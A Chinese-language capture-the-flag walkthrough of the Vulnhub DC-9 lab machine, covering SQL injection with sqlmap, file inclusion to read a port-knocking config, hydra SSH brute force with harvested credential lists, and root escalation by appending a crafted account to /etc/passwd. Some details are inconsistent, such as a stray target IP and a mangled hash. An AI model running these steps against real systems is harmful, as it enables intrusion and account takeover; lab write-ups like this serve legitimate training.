每周打靶 | Vulnhub-DC9靶机渗透实战

0x00前言

这是网络安全自修室每周带星球小伙伴一起实战的第8台靶机，欢迎有兴趣的小伙伴一起加入实操，毕竟实践出真知！

靶机可从Vulnhub平台免费下载，并通过虚拟机在本地搭建，渗透实战是一个找寻靶机中的flag的过程，并以获得最终的flag为目标！

攻击机：Kali Linux

靶机环境：192.168.241.142

所用工具：Nmap | Burpsuite | Sqlmap | Hydra | openssl

0x01 知识点

• SQL注入
• knockd服务 (限制ssh开启)
• openssl生成加密账号

0x02 信息搜集

端口发现

只开放了80端口

对网页进行访问

登录页面，发现有两个地方可以操控，可能是sql注入，对http://192.168.241.142/manage.php操作，发现无果，接着尝试另一个search页面

http://192.168.241.142/manage.phphttp://192.168.241.142/search.php

输入1’ 报错，说明存在sql注入，但查看url，发现为post注入

综上信息搜集可以发现,该目标服务器为Linux, 仅开放80端口，中间件为Apache,考虑从SQL注入漏洞进行重点突破后台

0x03 获取权限

对result.php进行抓包，任意查询关键字，抓包保存

丢给sqlmap,直接开跑

python3 sqlmap.py -r search.txt --dbs --batch --level 5

发现员工表，进行跑字段和数据，获取admin的密码transorbital1

直接登录后台，发现报错文件不存在

考虑存在LFI漏洞

获取到用户列表保存为users.txt

rootsynclistgnatsBug-ReportingSystemsystemd-timesyncTimesystemd-networkNetworksystemd-resolvesystemd-coredumpCoremysqlmarymMoejuliedDooleyfredfFlintstonebarneyrRubbletomcCatjerrymMousewilmafFlintstonebettyrRubblechandlerbBingjoeytTribbianirachelgGreenrossgGellermonicagGellerphoebebBuffayscootsMcScootsjanitorTrumpjanitor2Morrison

但是，信息搜集未曾发现ssh服务端口打开，考虑可能是因为安装了端口敲门服务，端口敲门服务默认的配置文件路径为：/etc/knockd.conf

文件包含 读取下，发现需要连续扫描7469,8475,9842这三个端口，才能打开 尝试使用nmap 进行敲门服务

nmap 192.168.241.142 -p 7469nmap 192.168.241.142 -p 8475 nmap 192.168.241.142 -p 9842

所以扫描后发现ssh服务已开启

搜集之前注入时获取的密码作为字典

保存为passwords.txt

3kfs86sfd468sfdfsd24sfd87sfd1RocksOffTC&TheBoyzB8m#48sdPebblesBamBam01UrAG0D!Passw0rdyN72#dsdILoveRachel3248dsds7ssmellycatsYR3BVxxxw87IlovepeepeeHawaii-Five-0

使用hydra工具对ssh服务进行爆破

hydra -L username.txt -P passwd.txt ssh://192.168.88.13

登录janitor/Ilovepeepee账户，发现一个隐藏文件

ssh [email protected]

将隐藏文件的密码放入passwd中，再次解密发现一个新账号fredf/B4-Tru3-001

提权

查看fredf用户可以哪些具有root权限的命令

发现一个test.py的文件

py文件的含义为：读取参数1的内容，然后将参数1的内容写入到参数2的内容中。那我们可以构造一个root权限用户，将该用户信息写入文件内，将改文件作为参数1，/etc/passwd作为参数2，这样就创建了一个root权限用户，就能实现提权了

使用openssl创建一个加密本地用户admins,密码为123456

openssl passwd -1 -salt admins 123456

在/tmp下创建flag的文件，使用sudo用test文件运行这个文件

echo 'admins:admins$VQIAQbRBWh1F8Sv7e3vj91:0:0::/root:/bin/bash' >>/tmp/flag

切换到admin用户，获取flag

0x04 总结

• 通过扫描发现只开启了web端口，并发现了注入漏洞
• 从注入漏洞拿到了admin的账号密码，登录后台后发现LFI漏洞的，读取到Knock文件配置，发现开启ssh服务规律
• 使用hydra爆破出ssh的三个账号，在其中一个账号中发现密码本，拓展爆破又拿到新账号密码fredf
• 在fredf用户中发现具有suid权限的test.py脚本，可以将内容写入任意文件，构造具有root同等权限的用户admins的hash写入/etc/passwd文件中，获取到root权限